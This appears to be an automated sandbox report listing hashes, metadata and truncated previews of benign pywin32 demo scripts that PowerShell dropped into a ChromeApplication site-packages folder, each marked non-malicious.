                                                                                                                                                                                                  SHA-256:3593ED8F69F6A4886C77831170869FB096B1C253A7748CB905BAA5FA21222189
                                                                                                                                                                                                  SHA-512:4DC7D107110F6D69EF61CE0286698C915130A82B83FC46FC6BB2B8ACCF6B4C9D2F92E06839FB399046E11822073C3091AC91C601EB6AFB8CB9CADCAAABD33FE9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32api.import win32file...def ProgressRoutine(. TotalFileSize,. TotalBytesTransferred,. StreamSize,. StreamBytesTransferred,. StreamNumber,. CallbackReason,. SourceFile,. DestinationFile,. Data,.):. print(Data). print(. TotalFileSize,. TotalBytesTransferred,. StreamSize,. StreamBytesTransferred,. StreamNumber,. CallbackReason,. SourceFile,. DestinationFile,. ). ##if TotalBytesTransferred > 100000:. ## return win32file.PROGRESS_STOP. return win32file.PROGRESS_CONTINUE...temp_dir = win32api.GetTempPath().fsrc = win32api.GetTempFileName(temp_dir, "cfe")[0].fdst = win32api.GetTempFileName(temp_dir, "cfe")[0].print(fsrc, fdst)..f = open(fsrc, "w").f.write("xxxxxxxxxxxxxxxx\n" * 32768).f.close().## add a couple of extra data streams.f = open(fsrc + ":stream_y", "w").f.write("yyyyyyyyyyyyyyyy\n" * 32768).f.close().f = open(fsrc + ":stream_z", "w").f.write("zzzzzzzzzzzzzzzz\n" * 327

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\CreateFileTransacted_MiniVersion.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3678
                                                                                                                                                                                                  Entropy (8bit):4.93181107133077
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:fbFIef2CiZCVfCz1UbI6Pp16P7U0NUeVcUBwfyHMJ7:zHzVCzmTvetcum
                                                                                                                                                                                                  MD5:B233DC4ABD6C31BBB7CD09796425F3FE
                                                                                                                                                                                                  SHA1:2E815CE1731D3898825FE7C710C91B3F60AC0819
                                                                                                                                                                                                  SHA-256:F2E14F3E7DA3E92929621EF1D8B638B5E6585C01500EAD7BD3235E74EB7537AE
                                                                                                                                                                                                  SHA-512:7DC3AD3EE811802AA74DE243809724A7F04893FF22771A47239F7C1B5DC0DE0F3E4351A09C1B8BFE61126A588509E1E5715277D807F5170B97FFE82D7856C7AF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:""".This demonstrates the creation of miniversions of a file during a transaction..The FSCTL_TXFS_CREATE_MINIVERSION control code saves any changes to a new.miniversion (effectively a savepoint within a transaction).."""..import os.import struct..import win32api.import win32con.import win32file.import win32transaction.import winerror.import winioctlcon.from pywin32_testutil import str2bytes # py3k-friendly helper...def demo():. """. Definition of buffer used with FSCTL_TXFS_CREATE_MINIVERSION:. typedef struct _TXFS_CREATE_MINIVERSION_INFO{. USHORT StructureVersion;. USHORT StructureLength;. ULONG BaseVersion;. USHORT MiniVersion;}. """. buf_fmt = "HHLH0L" ## buffer size must include struct padding. buf_size = struct.calcsize(buf_fmt).. tempdir = win32api.GetTempPath(). tempfile = win32api.GetTempFileName(tempdir, "cft")[0]. print("Demonstrating transactions on tempfile", tempfile). f = open(tempfile, "w"). f.write("This is

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\EvtFormatMessage.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3360
                                                                                                                                                                                                  Entropy (8bit):4.398214944508592
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:kgYXIV9bVYIipZaa4YrZ8qOZ266bzrfRmm9CKXYzx27Kv06/9tOo57iYi:k7W9bVYFpZaCrZ8qOZJ6bz7cm9/YzgO8
                                                                                                                                                                                                  MD5:BF88AD04588F165B826D3321E4203135
                                                                                                                                                                                                  SHA1:C332E8523536EE5500782156459865DE0069DB37
                                                                                                                                                                                                  SHA-256:5C0DF671D1FBF8EAAF0277B9A418707D15B72939BFD2DD82029FAB7F51E89F9E
                                                                                                                                                                                                  SHA-512:AE99D655D60EBE9077788F3F4EE32D19C1A3B70D9274264997F05CECBAADD2219F4A8D49DDFB72A4A307FD2D8B6776EEAC94E173B66C3BE225F8EC02FE2DAA97
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import sys..import win32evtlog...def main():. path = "System". num_events = 5. if len(sys.argv) > 2:. path = sys.argv[1]. num_events = int(sys.argv[2]). elif len(sys.argv) > 1:. path = sys.argv[1].. query = win32evtlog.EvtQuery(path, win32evtlog.EvtQueryForwardDirection). events = win32evtlog.EvtNext(query, num_events). context = win32evtlog.EvtCreateRenderContext(win32evtlog.EvtRenderContextSystem).. for i, event in enumerate(events, 1):. result = win32evtlog.EvtRender(. event, win32evtlog.EvtRenderEventValues, Context=context. ).. print("Event {}".format(i)).. level_value, level_variant = result[win32evtlog.EvtSystemLevel]. if level_variant != win32evtlog.EvtVarTypeNull:. if level_value == 1:. print(" Level: CRITICAL"). elif level_value == 2:. print(" Level: ERROR"). elif level_value == 3:. print(" Level: WAR

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\EvtSubscribe_pull.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):792
                                                                                                                                                                                                  Entropy (8bit):4.872080815758319
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:jsf9CzpJr+9f12fR3Ng5Ed8f6W/PEUzv37:QYzvr+992fBNgk8nf3
                                                                                                                                                                                                  MD5:D360933C44E9DEC9F75199B3651E6537
                                                                                                                                                                                                  SHA1:CDF798EC67E65CB9FAA6AF7C1D3500AED59B87F0
                                                                                                                                                                                                  SHA-256:A4AA23F9C16AA2E78A1A22A0C12B1854BC0019ABF33670672A52773C53249911
                                                                                                                                                                                                  SHA-512:4E964A2BFA726740784CB6EC44EAA3EA7E70CCF78FC8678C87855A9C135E71142B01392E1ED8A4F0CD12DC909D04C1A38C4715486A99A57B4B7F8B178B6CDE4C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:## Demonstrates how to create a "pull" subscription.import win32con.import win32event.import win32evtlog..query_text = '*[System[Provider[@Name="Microsoft-Windows-Winlogon"]]]'..h = win32event.CreateEvent(None, 0, 0, None).s = win32evtlog.EvtSubscribe(. "System",. win32evtlog.EvtSubscribeStartAtOldestRecord,. SignalEvent=h,. Query=query_text,.)..while 1:. while 1:. events = win32evtlog.EvtNext(s, 10). if len(events) == 0:. break. ##for event in events:. ##.print(win32evtlog.EvtRender(event, win32evtlog.EvtRenderEventXml)). print("retrieved %s events" % len(events)). while 1:. print("waiting..."). w = win32event.WaitForSingleObjectEx(h, 2000, True). if w == win32con.WAIT_OBJECT_0:. break.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\EvtSubscribe_push.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):692
                                                                                                                                                                                                  Entropy (8bit):4.945280120308455
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:jVXv9/WEpLDZAEpJr+937U1KXASpvFKMwpM7tLNFKYVXWKdC/2BdVD49y4hfR3kF:jbWqzpJr+9bvFKTpyzFKYVXDq27VD49A
                                                                                                                                                                                                  MD5:52D985F0616A0F7455B5F7910B07182D
                                                                                                                                                                                                  SHA1:D4ACD75A93ACA5F4B3205A5AC340695A283A6039
                                                                                                                                                                                                  SHA-256:B6027143EE94E0E332D3851E23948BF6A98C4F6FEC26262703FAF6774FE3355D
                                                                                                                                                                                                  SHA-512:A53F1558E74F3E5B1C238E71A0EDD62BA0A5D0383C60F620B3489A8AA0387FA639BC871A14D042BB179C7E166E1413F672690B0E61F2E75D95CA10EA95C9BDC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:## Demonstrates a "push" subscription with a callback function.import win32evtlog..query_text = '*[System[Provider[@Name="Microsoft-Windows-Winlogon"]]]'...def c(reason, context, evt):. if reason == win32evtlog.EvtSubscribeActionError:. print("EvtSubscribeActionError"). elif reason == win32evtlog.EvtSubscribeActionDeliver:. print("EvtSubscribeActionDeliver"). else:. print("??? Unknown action ???", reason). context.append(win32evtlog.EvtRender(evt, win32evtlog.EvtRenderEventXml)). return 0...evttext = [].s = win32evtlog.EvtSubscribe(. "System",. win32evtlog.EvtSubscribeStartAtOldestRecord,. Query="*",. Callback=c,. Context=evttext,.).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\FileSecurityTest.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4397
                                                                                                                                                                                                  Entropy (8bit):4.74911812392731
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:MgzkJJSBpe8lEILIzeU/lC2PHVH+YSrcsanIP9YO8OoUCDfOxVkfGbHyZrfpx4l4:MgY2vpEIANCaHFGh9YlU+GxifBx4i
                                                                                                                                                                                                  MD5:430E76B755434E0D55E9F95AFDB387D0
                                                                                                                                                                                                  SHA1:53171BBFFB86036C9BC312DAC4FA358C0D2DDC32
                                                                                                                                                                                                  SHA-256:CCB6A2880CAC7C9D67966F0185DBF8175F01F6C7DA76058D2B55E61CFA8FE687
                                                                                                                                                                                                  SHA-512:8381D4E1BC373FE7DC798D2DE6A2E785667374436AFC9BDBA701733C08B627028FD76F0D5C0A194FAD7CC99994CC9290F3478CBB5FCAD09EB046F521B016BF2F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Contributed by Kelly Kranabetter..import os.import sys..import ntsecuritycon.import pywintypes.import win32security.import winerror..# get security information.# name=r"c:\autoexec.bat".# name= r"g:\!workgrp\lim".name = sys.argv[0]..if not os.path.exists(name):. print(name, "does not exist!"). sys.exit()..print("On file ", name, "\n")..# get owner SID.print("OWNER").try:. sd = win32security.GetFileSecurity(name, win32security.OWNER_SECURITY_INFORMATION). sid = sd.GetSecurityDescriptorOwner(). print(" ", win32security.LookupAccountSid(None, sid)).except pywintypes.error as exc:. # in automation and network shares we see:. # pywintypes.error: (1332, 'LookupAccountName', 'No mapping between account names and security IDs was done.'). if exc.winerror != winerror.ERROR_NONE_MAPPED:. raise. print("No owner information is available")..# get group SID.try:. print("GROUP"). sd = win32security.GetFileSecurity(name, win32security.GROUP_SECURITY_INFORMATI

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\GetSaveFileName.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1184
                                                                                                                                                                                                  Entropy (8bit):5.129410238641104
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:9a3KeaJjPAhAs/6tgRMBuXI/KPAoTAs/MtgRMBuXH:I3sGhAAQAMaAAuA3
                                                                                                                                                                                                  MD5:07D0143379349CB71B6701D8BF4D2480
                                                                                                                                                                                                  SHA1:8D13834D7BCEF11174F631C4EFDA3E45E18D31CB
                                                                                                                                                                                                  SHA-256:AA67DE1EC080EEFAD5CA4F5054778915AF8F282C2AF7D76243E66F409A1365B5
                                                                                                                                                                                                  SHA-512:13331E7E7504822C2F3E9C693E27774BAE16B3DDA738695C43EBB79DFB3102F573F957B2EF437CC0BC0732218300FCA1C9E1CBE9B78C81D15DB9949EF9E3A257
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import win32con.import win32gui..filter = "Python Scripts\0*.py;*.pyw;*.pys\0Text files\0*.txt\0".customfilter = "Other file types\0*.*\0"..fname, customfilter, flags = win32gui.GetSaveFileNameW(. InitialDir=os.environ["temp"],. Flags=win32con.OFN_ALLOWMULTISELECT | win32con.OFN_EXPLORER,. File="somefilename",. DefExt="py",. Title="GetSaveFileNameW",. Filter=filter,. CustomFilter=customfilter,. FilterIndex=1,.)..print("save file names:", repr(fname)).print("filter used:", repr(customfilter)).print("Flags:", flags).for k, v in list(win32con.__dict__.items()):. if k.startswith("OFN_") and flags & v:. print("\t" + k)..fname, customfilter, flags = win32gui.GetOpenFileNameW(. InitialDir=os.environ["temp"],. Flags=win32con.OFN_ALLOWMULTISELECT | win32con.OFN_EXPLORER,. File="somefilename",. DefExt="py",. Title="GetOpenFileNameW",. Filter=filter,. CustomFilter=customfilter,. FilterIndex=0,.)..print("open file names:", repr(f

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\NetValidatePasswordPolicy.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3508
                                                                                                                                                                                                  Entropy (8bit):4.535330596706897
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:qLKMszTwVasgHhCIlwaoHHqohRohw36Fup8dZpIhyA:qLlszYa7QIlwaonqkRkw36c83gyA
                                                                                                                                                                                                  MD5:A703B33F30ADDE0B10973667F662CC7F
                                                                                                                                                                                                  SHA1:D93572C859D1AC36ABE313452812B68BC14B9E7C
                                                                                                                                                                                                  SHA-256:EA659B89FF3F9F1959C2B7AF8F075A0A2099533AFE7EB1CA7E72957732A05FF0
                                                                                                                                                                                                  SHA-512:45C55EE1037C5F25BE8F4B796A55D12E37DCB965F5DAC48E62903DB75AD984775CC5D13E81372EB94F8CE256CAD97E055F6BE8060CD835A213AFC468493E3459
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:"""A demo of using win32net.NetValidatePasswordPolicy...Example usage:..% NetValidatePasswordPolicy.py --password=foo change.which might return:..> Result of 'change' validation is 0: The operation completed successfully...or depending on the policy:..> Result of 'change' validation is 2245: The password does not meet the.> password policy requirements. Check the minimum password length,.> password complexity and password history requirements...Adding --user doesn't seem to change the output (even the PasswordLastSet seen.when '-f' is used doesn't depend on the username), but theoretically it will.also check the password history for the specified user...% NetValidatePasswordPolicy.py auth..which always (with and without '-m') seems to return:..> Result of 'auth' validation is 2701: Password must change at next logon."""..import optparse.import sys.from pprint import pprint..import win32api.import win32net.import win32netcon...def main():. parser = optparse.OptionParser(. "%pr

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\OpenEncryptedFileRaw.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2023
                                                                                                                                                                                                  Entropy (8bit):5.051057812294554
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:tYq2r8q7QjxNaerKec8dsgkcXKna4uuD44Drd:tYqSaaGKd8d/kcana4Brd
                                                                                                                                                                                                  MD5:1579B6CDBB6769E65896F32483CA08F5
                                                                                                                                                                                                  SHA1:D7FFA56CC5E829FFA5BCBB145644E0AB219DEB6C
                                                                                                                                                                                                  SHA-256:79D916989C1CA439CD602BF8C7A5FB7749421D64E0BFACBFF039B3F91E39A24A
                                                                                                                                                                                                  SHA-512:F34B2045343CD21CAB62955D197CEE1969998680FDA080CE7FFD4C904B9C38536193C2330E321FCCD14224F8258BBFC51DB963F61472C9293525C253B9BA9360
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import win32api.import win32file.import winerror...def ReadCallback(input_buffer, data, buflen):. fnamein, fnameout, f = data. ## print fnamein, fnameout, buflen. f.write(input_buffer). ## python 2.3 throws an error if return value is a plain int. return winerror.ERROR_SUCCESS...def WriteCallback(output_buffer, data, buflen):. fnamebackup, fnameout, f = data. file_data = f.read(buflen). ## returning 0 as len terminates WriteEncryptedFileRaw. output_len = len(file_data). output_buffer[:output_len] = file_data. return winerror.ERROR_SUCCESS, output_len...tmp_dir = win32api.GetTempPath().dst_dir = win32api.GetTempFileName(tmp_dir, "oef")[0].os.remove(dst_dir).os.mkdir(dst_dir).print("Destination dir:", dst_dir)..## create an encrypted file.fname = win32api.GetTempFileName(dst_dir, "ref")[0].print("orig file:", fname).f = open(fname, "w").f.write("xxxxxxxxxxxxxxxx\n" * 32768).f.close().## add a couple of extra data streams.f = open(fname + ":stre

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\RegCreateKeyTransacted.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1912
                                                                                                                                                                                                  Entropy (8bit):4.996086312535218
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Zy02jhZ2V6v5kHEETdZUCOxtVbpVRN9H1Vbd0OVyVbrqVbH0:Z6jmAvUEEZZUFt7N9H1P/y1ql0
                                                                                                                                                                                                  MD5:741D38BEDF1C869EE787FC7ACAEC0021
                                                                                                                                                                                                  SHA1:13E733C166A8FDAFC61199E18B7D5E5D1CC5E8C7
                                                                                                                                                                                                  SHA-256:61E15FB3EBAB14C07BD6085672916195BA13259BFEE3E7DD4C6EF8DE99CF0BBB
                                                                                                                                                                                                  SHA-512:0B27730E1FEB8E10E03664789A588B8BA0B9E7B3D07F328B0E87C6F3A597B74A40A6BF9654A66035071C013D37EF543A65EAC0D4DFE074F4C6DE3FEDF655EA4C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import win32api.import win32con.import win32transaction..keyname = "Pywin32 test transacted registry functions".subkeyname = "test transacted subkey".classname = "Transacted Class"..trans = win32transaction.CreateTransaction(Description="test RegCreateKeyTransacted").key, disp = win32api.RegCreateKeyEx(. win32con.HKEY_CURRENT_USER,. keyname,. samDesired=win32con.KEY_ALL_ACCESS,. Class=classname,.).## clean up any existing keys.for subk in win32api.RegEnumKeyExW(key):. win32api.RegDeleteKey(key, subk[0])..## reopen key in transacted mode.transacted_key = win32api.RegOpenKeyTransacted(. Key=win32con.HKEY_CURRENT_USER,. SubKey=keyname,. Transaction=trans,. samDesired=win32con.KEY_ALL_ACCESS,.).subkey, disp = win32api.RegCreateKeyEx(. transacted_key,. subkeyname,. Transaction=trans,. samDesired=win32con.KEY_ALL_ACCESS,. Class=classname,.)..## Newly created key should not be visible from non-transacted handle.subkeys = [s[0] for s in win32api.RegEnu

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\RegRestoreKey.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2063
                                                                                                                                                                                                  Entropy (8bit):5.11300797395737
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:01b8JS3KmpnnP7iS8sE2Nzp6De+/L6ye+2mMvHwzpbA+exs:+b8JwKmpPX8sJzpse+/eye+2mMPwzpcG
                                                                                                                                                                                                  MD5:1BE4DC6030AA23DD32D4E7CAD3A1F0D8
                                                                                                                                                                                                  SHA1:49F6308BF8E3A6F7D765B699A02F17393EBE2FB0
                                                                                                                                                                                                  SHA-256:B02E9C41D6E51EBE3926C1746E5372E62AC2613F847FFF95C5D6F9EA368572DF
                                                                                                                                                                                                  SHA-512:6D78179DBE0CABE9A2EEDD9FBFDDD0BD33B2A397E0D48AB05AFA4970424E22F4C262526E489FBB26B7565A43764D7CCEE8BD827FF09FFF4106E334DFCAE453D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os..import ntsecuritycon.import win32api.import win32con.import win32security.import winnt..temp_dir = win32api.GetTempPath().fname = win32api.GetTempFileName(temp_dir, "rsk")[0].print(fname).## file can't exist.os.remove(fname)..## enable backup and restore privs.required_privs = (. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_BACKUP_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),. (. win32security.LookupPrivilegeValue("", ntsecuritycon.SE_RESTORE_NAME),. win32con.SE_PRIVILEGE_ENABLED,. ),.).ph = win32api.GetCurrentProcess().th = win32security.OpenProcessToken(. ph, win32con.TOKEN_READ | win32con.TOKEN_ADJUST_PRIVILEGES.).adjusted_privs = win32security.AdjustTokenPrivileges(th, 0, required_privs)..try:. sa = win32security.SECURITY_ATTRIBUTES(). my_sid = win32security.GetTokenInformation(th, ntsecuritycon.TokenUser)[0]. sa.SECURITY_DESCRIPTOR.SetSecurityDescriptorOwner(my_sid, 0).. k, disp = win32api.RegCreateKeyEx(

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\SystemParametersInfo.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7957
                                                                                                                                                                                                  Entropy (8bit):5.388617419802842
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:3jwj8c3w/SDwculj0wyi+Brwx6yO15ulj0PwxH/sZ003arjrarVyz9ovDkMq/nqf:leZDBA695ZkH/sX3+xFcXcvff0vt0vk
                                                                                                                                                                                                  MD5:E9EFEB93CB39D5E58DC872610C559C9B
                                                                                                                                                                                                  SHA1:E857D85B5FCE044393BB761C2066D5C6D80DB517
                                                                                                                                                                                                  SHA-256:B57538B210D4FD23437E3F0F9FCDA52FDA038F6CCB7E3BF4DB626D2C3EF8F200
                                                                                                                                                                                                  SHA-512:3B48E942370DBD06744B114DCDB230096E3AAACBA426A95F0361B10D780CDBD11188837490EECECE37C1940CE2216A6AC95D63287E10699DC19E4F88FA972D0A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import glob.import os.import time..import win32api.import win32con.import win32gui..## some of these tests will fail for systems prior to XP..for pname in (. ## Set actions all take an unsigned int in pvParam. "SPI_GETMOUSESPEED",. "SPI_GETACTIVEWNDTRKTIMEOUT",. "SPI_GETCARETWIDTH",. "SPI_GETFOREGROUNDFLASHCOUNT",. "SPI_GETFOREGROUNDLOCKTIMEOUT",. ## Set actions all take an unsigned int in uiParam. "SPI_GETWHEELSCROLLLINES",. "SPI_GETKEYBOARDDELAY",. "SPI_GETKEYBOARDSPEED",. "SPI_GETMOUSEHOVERHEIGHT",. "SPI_GETMOUSEHOVERWIDTH",. "SPI_GETMOUSEHOVERTIME",. "SPI_GETSCREENSAVETIMEOUT",. "SPI_GETMENUSHOWDELAY",. "SPI_GETLOWPOWERTIMEOUT",. "SPI_GETPOWEROFFTIMEOUT",. "SPI_GETBORDER",. ## below are winxp only:. "SPI_GETFONTSMOOTHINGCONTRAST",. "SPI_GETFONTSMOOTHINGTYPE",. "SPI_GETFOCUSBORDERHEIGHT",. "SPI_GETFOCUSBORDERWIDTH",. "SPI_GETMOUSECLICKLOCKTIME",.):. print(pname). cget = getattr(win32con, pname). cset =

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\c_extension\setup.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):767
                                                                                                                                                                                                  Entropy (8bit):4.806261092723215
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:h2BqulhxkNMdtNDf4wqWDD1JGACGiT9nibQOK0+68oa3USS2sidBHS82q5Vcg0kS:hHujKMlEwq6rCnZib7EosEK35mg0cm
                                                                                                                                                                                                  MD5:1A58DDE5C50B46C1D1F8EA2DFC5864C0
                                                                                                                                                                                                  SHA1:97132512402D2EB34AC1D098BC7FFC4777BFDBD7
                                                                                                                                                                                                  SHA-256:25D58FD5E6D02A1DD5EE74E07446D8F16C0F1BFE244B26EF33E0D44FE75EE6F3
                                                                                                                                                                                                  SHA-512:4FCB571603C1AA1083ABAB5B7EC67C32B6FD2AA06AEC74B3F15276C61D828E9F2666F2871E48673B24B4E0EA2864ECB8B391F622FCC2EC6FCE20262C9FA62082
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A sample distutils script to show to build your own.# extension module which extends pywintypes or pythoncom..#.# Use 'python setup.py build' to build this extension..import os.from distutils.core import Extension, setup.from sysconfig import get_paths..sources = ["win32_extension.cpp"].lib_dir = get_paths()["platlib"]..# Specify the directory where the PyWin32 .h and .lib files are installed..# If you are doing a win32com extension, you will also need to add.# win32com\Include and win32com\Libs..ext = Extension(. "win32_extension",. sources,. include_dirs=[os.path.join(lib_dir, "win32", "include")],. library_dirs=[os.path.join(lib_dir, "win32", "libs")],.)..setup(. name="win32 extension sample",. version="0.1",. ext_modules=[ext],.).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\cerapi.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):7919
                                                                                                                                                                                                  Entropy (8bit):4.65097395781897
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:9H9Yc+w3MkDGXmimgbbxpgMCxOo5EBrjm8TRd6i:9HbEDfbgxWR
                                                                                                                                                                                                  MD5:6A35220B5A6D51EFDA6A0149AB846E42
                                                                                                                                                                                                  SHA1:51A99F41083A92C1331E4DF817BBC0D6C9FAD7F3
                                                                                                                                                                                                  SHA-256:7BC6B2F12435DAD24854E120E4D9426269C1FD5A65C8F8BD1B5EB1B1BCACCF96
                                                                                                                                                                                                  SHA-512:4324DBB3D41B1DA26F4D78A0706EE4A41A0BCCDD7EFD5C626556C459E95A25302B3684BD6AC9AAAF0C5FEFE81B9C91674D82E17DD03CC4FD90744E5D55A03558
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# A demo of the Windows CE Remote API.#.# This connects to a CE device, and interacts with it...import getopt.import os.import sys..import win32api.import win32con.import win32event.import wincerapi...def DumpPythonRegistry():. try:. h = wincerapi.CeRegOpenKeyEx(. win32con.HKEY_LOCAL_MACHINE,. "Software\\Python\\PythonCore\\%s\\PythonPath" % sys.winver,. ). except win32api.error:. print("The remote device does not appear to have Python installed"). return 0. path, typ = wincerapi.CeRegQueryValueEx(h, None). print("The remote PythonPath is '%s'" % (str(path),)). h.Close(). return 1...def DumpRegistry(root, level=0):. # A recursive dump of the remote registry to test most functions.. h = wincerapi.CeRegOpenKeyEx(win32con.HKEY_LOCAL_MACHINE, None). level_prefix = " " * level. index = 0. # Enumerate values.. while 1:. try:. name, data, typ = wincerapi.CeRegEnumValue(root, index).

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32\Demos\dde\ddeclient.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):434
                                                                                                                                                                                                  Entropy (8bit):4.946201052398342
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:ggRALa3M6AwMT2BthR9Do1BOiw+VLu9yMr+:h5zAfEh5V+A9dr+
                                                                                                                                                                                                  MD5:2D792963A25E0425CEB0E4EBA9533610
                                                                                                                                                                                                  SHA1:73775E1E6143D54E131BC8BCD5F6B9B8D722B1A9
                                                                                                                                                                                                  SHA-256:DFE50A175652A73619BD31ED5A03567F38B1F4F9B0654273DA0072335A181D0B
                                                                                                                                                                                                  SHA-512:0F8DB0BF6A83E0BFD4DB14AF288668E1FFC24E488CCBBC6A098522C19F22F991F90F92D95050E74B82EEF449C1A17E537ABC40F7572D1F2A6A801B134718E95C
                                                                                                                                                                                                  Malicious:false
